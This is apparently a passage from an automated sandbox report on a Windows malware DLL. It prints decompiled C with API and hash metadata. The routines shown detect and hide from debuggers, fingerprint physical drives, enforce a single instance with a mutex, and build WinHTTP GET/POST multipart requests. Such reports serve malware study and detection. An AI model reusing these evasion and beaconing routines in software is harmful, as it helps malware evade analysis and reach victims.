                                                                                                                                                      						goto L15;
                                                                                                                                                      					}
                                                                                                                                                      					if((_v1633 & 0x000000ff) == 0) {
                                                                                                                                                      						L11:
                                                                                                                                                      						CloseHandle(_v48);
                                                                                                                                                      						if(_v1600 == 0) {
                                                                                                                                                      							goto L15;
                                                                                                                                                      						}
                                                                                                                                                      						return _v1600;
                                                                                                                                                      					}
                                                                                                                                                      					asm("sbb edx, edx");
                                                                                                                                                      					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
                                                                                                                                                      					_v40 = 0;
                                                                                                                                                      					_v36 = 0;
                                                                                                                                                      					_v32 = 0;
                                                                                                                                                      					_v28 = 0;
                                                                                                                                                      					_v24 = 0;
                                                                                                                                                      					_v20 = 0;
                                                                                                                                                      					_v16 = 0;
                                                                                                                                                      					_v12 = 0;
                                                                                                                                                      					_v8 = 0;
                                                                                                                                                      					E1000CF20(_t123,  &_v2164, 0, 0x210);
                                                                                                                                                      					_t88 = E1001CF20( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
                                                                                                                                                      					_t124 = _t124 + 0x24;
                                                                                                                                                      					if(_t88 == 0) {
                                                                                                                                                      						goto L11;
                                                                                                                                                      					}
                                                                                                                                                      					_v60 =  &_v1596;
                                                                                                                                                      					_v44 =  &_v2148;
                                                                                                                                                      					do {
                                                                                                                                                      						 *_v60 =  *_v44 & 0x0000ffff;
                                                                                                                                                      						_v44 =  &(_v44[1]);
                                                                                                                                                      						_v60 =  &(_v60[1]);
                                                                                                                                                      					} while (_v44 <  &_v1636);
                                                                                                                                                      					_v56 = E1001CD70( &_v1596);
                                                                                                                                                      					_t94 = E1001CFA0(_v56, 0x104, _v52);
                                                                                                                                                      					_t124 = _t124 + 0x10;
                                                                                                                                                      					if(_t94 == 0) {
                                                                                                                                                      						_v1600 = 1;
                                                                                                                                                      					}
                                                                                                                                                      					goto L11;
                                                                                                                                                      				}
                                                                                                                                                      				goto L18;
                                                                                                                                                      			}








































                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001D831
                                                                                                                                                      • wsprintfW.USER32 ref: 1001D84C
                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D86B
                                                                                                                                                      • DeviceIoControl.KERNELBASE(000000FF,00074080,00000000,00000000,00000000,00000018,00000000,00000000), ref: 1001D8E3
                                                                                                                                                      • _memset.LIBCMT ref: 1001D96F
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1001DA1A
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1001DA37
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                      • API String ID: 381188756-2935326385
                                                                                                                                                      • Opcode ID: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                      • Instruction ID: e843174948dd7abc5fb59b2edd762e96836351ae516af004f3d86572885adcf9
                                                                                                                                                      • Opcode Fuzzy Hash: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                      • Instruction Fuzzy Hash: 21613DB1D04218ABEB20DF54CC95BDDB7B6EF84304F148199E509BB280D776AA94CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                      			E1001DA70(void* __edi, intOrPtr _a4) {
                                                                                                                                                      				struct _OVERLAPPED* _v8;
                                                                                                                                                      				struct _OVERLAPPED* _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				short _v532;
                                                                                                                                                      				struct _OVERLAPPED* _v536;
                                                                                                                                                      				struct _OVERLAPPED* _v540;
                                                                                                                                                      				void _v544;
                                                                                                                                                      				long _v548;
                                                                                                                                                      				struct _OVERLAPPED* _v552;
                                                                                                                                                      				intOrPtr _v10532;
                                                                                                                                                      				void _v10556;
                                                                                                                                                      				char _v11556;
                                                                                                                                                      				void* _t43;
                                                                                                                                                      				int _t48;
                                                                                                                                                      				void* _t56;
                                                                                                                                                      				void* _t70;
                                                                                                                                                      				void* _t71;
                                                                                                                                                      
                                                                                                                                                      				_t70 = __edi;
                                                                                                                                                      				E10018AA0(0x2d20);
                                                                                                                                                      				if(_a4 == 0) {
                                                                                                                                                      					L13:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v552 = 0;
                                                                                                                                                      				while(1 != 0) {
                                                                                                                                                      					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
                                                                                                                                                      					_t71 = _t71 + 0xc;
                                                                                                                                                      					_t43 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0); // executed
                                                                                                                                                      					_v16 = _t43;
                                                                                                                                                      					if(_v16 == 0xffffffff) {
                                                                                                                                                      						L10:
                                                                                                                                                      						_v8 =  &(_v8->Internal);
                                                                                                                                                      						_v552 = _v8;
                                                                                                                                                      						if(_v8 < 4) {
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      						return _v12;
                                                                                                                                                      					}
                                                                                                                                                      					_v548 = 0;
                                                                                                                                                      					_v536 = 0;
                                                                                                                                                      					_v544 = 0;
                                                                                                                                                      					_v540 = 0;
                                                                                                                                                      					E1000CF20(_t70,  &_v10556, 0, 0x2710);
                                                                                                                                                      					_t71 = _t71 + 0xc;
                                                                                                                                                      					_t48 = DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0); // executed
                                                                                                                                                      					if(_t48 != 0) {
                                                                                                                                                      						E1000CF20(_t70,  &_v11556, 0, 0x3e8);
                                                                                                                                                      						E1001D040(_v10532,  &_v10556,  &_v11556);
                                                                                                                                                      						_t56 = E1001CFA0( &_v11556, 0x104, _a4);
                                                                                                                                                      						_t71 = _t71 + 0x24;
                                                                                                                                                      						if(_t56 == 0) {
                                                                                                                                                      							_v12 = 1;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					FindCloseChangeNotification(_v16); // executed
                                                                                                                                                      					if(_v12 == 0) {
                                                                                                                                                      						_v8 = _v552;
                                                                                                                                                      						goto L10;
                                                                                                                                                      					} else {
                                                                                                                                                      						return _v12;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				goto L13;
                                                                                                                                                      			}





















                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                      • CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                      • _memset.LIBCMT ref: 1001DB21
                                                                                                                                                      • DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DB50
                                                                                                                                                      • _memset.LIBCMT ref: 1001DB68
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DBB4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$ChangeCloseControlCreateDeviceFileFindNotificationwsprintf
                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                      • API String ID: 198797371-2935326385
                                                                                                                                                      • Opcode ID: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                      • Instruction ID: bc891f1c4ccce3a70caf683a604835e8428f56d0e5539b736f6604e1ef8a2667
                                                                                                                                                      • Opcode Fuzzy Hash: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                      • Instruction Fuzzy Hash: A6412B75D40218EBEB10EB90DC99FDDB7B8EB14704F108599E509AA281D7B4AB88CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019F00() {
                                                                                                                                                      				void _v8;
                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                      				struct HINSTANCE__* _v16;
                                                                                                                                                      
                                                                                                                                                      				_v8 = 1;
                                                                                                                                                      				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                      				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                      				NtQueryInformationProcess(GetCurrentProcess(), 0x1f,  &_v8, 4, 0);
                                                                                                                                                      				return 0 | _v8 != 0x00000001;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F12
                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F24
                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F37
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 10019F3E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                      • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                      • API String ID: 3653371871-801751246
                                                                                                                                                      • Opcode ID: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                      • Instruction ID: 96ba2470dd98e020bf0cfbce012c3df4c205278cc2531598ec11657ea2300d3b
                                                                                                                                                      • Opcode Fuzzy Hash: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                      • Instruction Fuzzy Hash: F5F03075D00208FFEB00DFE0CC8DADCBB74EB04301F508094FA01A6140D6745A48CB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019F50() {
                                                                                                                                                      				void _v8;
                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                      				struct HINSTANCE__* _v16;
                                                                                                                                                      
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                      				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                      				NtQueryInformationProcess(GetCurrentProcess(), 0x1e,  &_v8, 4, 0);
                                                                                                                                                      				return 0 | _v8 != 0x00000000;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F62
                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F74
                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019F87
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 10019F8E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                      • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                      • API String ID: 3653371871-801751246
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
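E10019FA0() {
	void _v8;
	_Unknown_base(*)()* _v12;
	struct HINSTANCE__* _v16;

	_v8 = 0;
	_v16 = LoadLibraryA("Ntdll.dll");
	_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
	// Information class 7 is ProcessDebugPort; _v8 is nonzero when a user-mode debugger is attached.
	NtQueryInformationProcess(GetCurrentProcess(), 7, &_v8, 4, 0);
	// Returns 1 if a debug port was reported, otherwise 0.
	return 0 | _v8 != 0x00000000;
}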







                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FB2
                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FC4
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 10019FD7
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 10019FDE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                      • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                      • API String ID: 3653371871-801751246
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
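E10019D40() {
	_Unknown_base(*)()* _v8;
	struct HINSTANCE__* _v12;

	_v12 = LoadLibraryA("Ntdll.dll");
	_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
	// Information class 0x11 is ThreadHideFromDebugger; an attached debugger stops receiving events for this thread.
	return NtSetInformationThread(GetCurrentThread(), 0x11, 0, 0);
}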






                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll,?,100206A1), ref: 10019D4B
                                                                                                                                                      • GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019D5D
                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 10019D6C
                                                                                                                                                      • NtSetInformationThread.NTDLL(00000000,?,100206A1), ref: 10019D73
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Thread$AddressCurrentInformationLibraryLoadProc
                                                                                                                                                      • String ID: Ntdll.dll$ZwSetInformationThread
                                                                                                                                                      • API String ID: 1707985920-1680533912
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
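E1001A0F0(CHAR* _a4) {
	struct _SECURITY_DESCRIPTOR _v24;
	int _v28;
	struct _SECURITY_ATTRIBUTES _v40;
	int _v44;
	void* _t19;

	_v44 = 0;
	_v28 = 0;
	InitializeSecurityDescriptor( &_v24, 1);
	// A present but NULL DACL places no access restrictions on the object.
	SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
	_v40.nLength = 0xc;
	_v40.bInheritHandle = 1;
	_v40.lpSecurityDescriptor =  &_v24;
	// Named mutex; the name is passed in by the caller as _a4.
	_t19 = CreateMutexA( &_v40, 0, _a4); // executed
	_v28 = _t19;
	// 0xb7 is ERROR_ALREADY_EXISTS: the mutex was already created, typically by another running instance.
	if(_v28 != 0 && GetLastError() == 0xb7) {
		_v44 = 1;
	}
	// Returns 1 if the named mutex already existed, otherwise 0.
	return _v44;
}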









                                                                                                                                                      APIs
                                                                                                                                                      • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A10A
                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A11A
                                                                                                                                                      • CreateMutexA.KERNELBASE(0000000C,00000000,10020584), ref: 1001A13E
                                                                                                                                                      • GetLastError.KERNEL32 ref: 1001A14D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4085719312-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $x
                                                                                                                                                      • API String ID: 0-1748666202
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
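E1001A170(CHAR* _a4) {
	struct _WIN32_FIND_DATAA _v324;
	intOrPtr _v328;
	void* _v332;
	void* _t11;

	_v328 = 0;
	_t11 = FindFirstFileA(_a4,  &_v324); // executed
	_v332 = _t11;
	// 0xffffffff is INVALID_HANDLE_VALUE, returned when no file matches the path in _a4.
	if(_v332 != 0xffffffff) {
		_v328 = _v324.nFileSizeLow;
	}
	FindClose(_v332); // executed
	// Returns the low 32 bits of the file size, or 0 if the file was not found.
	return _v328;
}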








                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileA.KERNELBASE(1001A679,?), ref: 1001A18E
                                                                                                                                                      • FindClose.KERNELBASE(000000FF), ref: 1001A1B6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                                      			E10019FF0(void* __ecx) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      
                                                                                                                                                      				__imp__CheckRemoteDebuggerPresent(GetCurrentProcess(),  &_v8, __ecx); // executed
                                                                                                                                                      				return _v8;
                                                                                                                                                      			}





                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000001,?,?,1001A032,?,?,1001A0C0), ref: 10019FF8
                                                                                                                                                      • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?,?,1001A032,?,?,1001A0C0), ref: 10019FFF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CheckCurrentDebuggerPresentProcessRemote
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3244773808-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 47%
                                                                                                                                                      			E10021AF0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, signed int _a24, long _a28, long _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				char _v28;
                                                                                                                                                      				long _v32;
                                                                                                                                                      				char _v36;
                                                                                                                                                      				char _v40;
                                                                                                                                                      				long _v44;
                                                                                                                                                      				WCHAR* _v48;
                                                                                                                                                      				long _v52;
                                                                                                                                                      				short _v54;
                                                                                                                                                      				short _v58;
                                                                                                                                                      				short _v62;
                                                                                                                                                      				short _v66;
                                                                                                                                                      				short _v70;
                                                                                                                                                      				char _v72;
                                                                                                                                                      				long _v76;
                                                                                                                                                      				long _v80;
                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                      				long _v88;
                                                                                                                                                      				signed int _v92;
                                                                                                                                                      				intOrPtr _v96;
                                                                                                                                                      				intOrPtr _v100;
                                                                                                                                                      				intOrPtr _v104;
                                                                                                                                                      				intOrPtr _v108;
                                                                                                                                                      				char _v112;
                                                                                                                                                      				signed int _v116;
                                                                                                                                                      				char _v120;
                                                                                                                                                      				signed int _v124;
                                                                                                                                                      				long _v128;
                                                                                                                                                      				intOrPtr _v132;
                                                                                                                                                      				intOrPtr _v136;
                                                                                                                                                      				signed int _v140;
                                                                                                                                                      				char _v28334;
                                                                                                                                                      				char _v28336;
                                                                                                                                                      				intOrPtr _v28340;
                                                                                                                                                      				intOrPtr _v28344;
                                                                                                                                                      				char _v28862;
                                                                                                                                                      				short _v28864;
                                                                                                                                                      				long _v28868;
                                                                                                                                                      				long _v28872;
                                                                                                                                                      				long _v28876;
                                                                                                                                                      				intOrPtr _v28880;
                                                                                                                                                      				intOrPtr _v28884;
                                                                                                                                                      				char _v28912;
                                                                                                                                                      				char _v28940;
                                                                                                                                                      				long _v28944;
                                                                                                                                                      				intOrPtr _v28948;
                                                                                                                                                      				intOrPtr _v28952;
                                                                                                                                                      				intOrPtr _v28956;
                                                                                                                                                      				long _v28960;
                                                                                                                                                      				intOrPtr _v28964;
                                                                                                                                                      				intOrPtr _v28968;
                                                                                                                                                      				intOrPtr _v28972;
                                                                                                                                                      				intOrPtr _v28976;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				long _t263;
                                                                                                                                                      				intOrPtr _t267;
                                                                                                                                                      				long _t268;
                                                                                                                                                      				signed int* _t276;
                                                                                                                                                      				long _t277;
                                                                                                                                                      				long _t279;
                                                                                                                                                      				long _t288;
                                                                                                                                                      				long _t292;
                                                                                                                                                      				long _t295;
                                                                                                                                                      				long _t298;
                                                                                                                                                      				long _t311;
                                                                                                                                                      				intOrPtr _t330;
                                                                                                                                                      				intOrPtr _t470;
                                                                                                                                                      				void* _t471;
                                                                                                                                                      				void* _t473;
                                                                                                                                                      				void* _t479;
                                                                                                                                                      
                                                                                                                                                      				_t469 = __esi;
                                                                                                                                                      				_t468 = __edi;
                                                                                                                                                      				_t357 = __ebx;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022BD7);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t470;
                                                                                                                                                      				E10018AA0(0x7120);
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_v36 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_v20 = 0x50;
                                                                                                                                                      				_v40 = 0;
                                                                                                                                                      				_t263 = E100211B0(__ebx, __edi, __esi, _a16,  &_v24,  &_v36,  &_v28,  &_v20,  &_v40);
                                                                                                                                                      				_t471 = _t470 + 0x18;
                                                                                                                                                      				_v32 = _t263;
                                                                                                                                                      				if(_v32 == 0) {
                                                                                                                                                      					L66:
                                                                                                                                                      					 *[fs:0x0] = _v16;
                                                                                                                                                      					return _v32;
                                                                                                                                                      				} else {
                                                                                                                                                      					_v32 = 0;
                                                                                                                                                      					_v48 = "----WebKitFormBoundaryovEAlxca0DiIz7tl";
                                                                                                                                                      					_v76 = E1001A370(__ebx, __edi, __esi, _v28);
                                                                                                                                                      					_t267 = E1001A370(__ebx, __edi, __esi, _v40);
                                                                                                                                                      					_t473 = _t471 + 8;
                                                                                                                                                      					_v84 = _t267;
                                                                                                                                                      					_v72 = 0;
                                                                                                                                                      					_v70 = 0;
                                                                                                                                                      					_v66 = 0;
                                                                                                                                                      					_v62 = 0;
                                                                                                                                                      					_v58 = 0;
                                                                                                                                                      					_v54 = 0;
                                                                                                                                                      					_t268 = _a20;
                                                                                                                                                      					_v28944 = _t268;
                                                                                                                                                      					if(_v28944 == 1) {
                                                                                                                                                      						_t268 = E1000E743(0,  &_v72, 0xa, L"GET");
                                                                                                                                                      						_t473 = _t473 + 0xc;
                                                                                                                                                      					} else {
                                                                                                                                                      						if(_v28944 > 1) {
                                                                                                                                                      							if(_v28944 <= 3) {
                                                                                                                                                      								_t268 = E1000E743( &_v72,  &_v72, 0xa, L"POST");
                                                                                                                                                      								_t473 = _t473 + 0xc;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_v88 = 0;
                                                                                                                                                      					_v44 = 0;
                                                                                                                                                      					_v80 = 0;
                                                                                                                                                      					_v52 = 0;
                                                                                                                                                      					__imp__WinHttpOpen(L"A WinHTTP Example Program/1.0", 0, 0, 0, 0); // executed
                                                                                                                                                      					_v44 = _t268;
                                                                                                                                                      					if(_v44 == 0) {
                                                                                                                                                      						L59:
                                                                                                                                                      						__eflags = _v52;
                                                                                                                                                      						if(_v52 != 0) {
                                                                                                                                                      							__imp__WinHttpCloseHandle(_v52);
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _v80;
                                                                                                                                                      						if(_v80 != 0) {
                                                                                                                                                      							__imp__WinHttpCloseHandle(_v80);
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _v44;
                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                      							__imp__WinHttpCloseHandle(_v44);
                                                                                                                                                      						}
                                                                                                                                                      						_push(_v84);
                                                                                                                                                      						E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                      						_push(_v76);
                                                                                                                                                      						E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                      						_push(_v36);
                                                                                                                                                      						E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                      						_push(_v28);
                                                                                                                                                      						E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                      						_push(_v40);
                                                                                                                                                      						E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                      						goto L66;
                                                                                                                                                      					}
                                                                                                                                                      					_t504 = _a4;
                                                                                                                                                      					if(_a4 != 0) {
                                                                                                                                                      						_v100 = E1001A370(_t357, _t468, _t469, _a4);
                                                                                                                                                      						_v112 = 3;
                                                                                                                                                      						_v108 = _v100;
                                                                                                                                                      						_v104 = 0x10024f9c;
                                                                                                                                                      						__imp__WinHttpSetOption(_v44, 0x26,  &_v112, 0xc);
                                                                                                                                                      						_push(_v100);
                                                                                                                                                      						E1000CA30(_t357, _t468, _t469, _t504);
                                                                                                                                                      						_t473 = _t473 + 8;
                                                                                                                                                      					}
                                                                                                                                                      					asm("sbb edx, edx");
                                                                                                                                                      					_v92 =  ~_a24 & 0x00000002;
                                                                                                                                                      					_t276 =  &_v92;
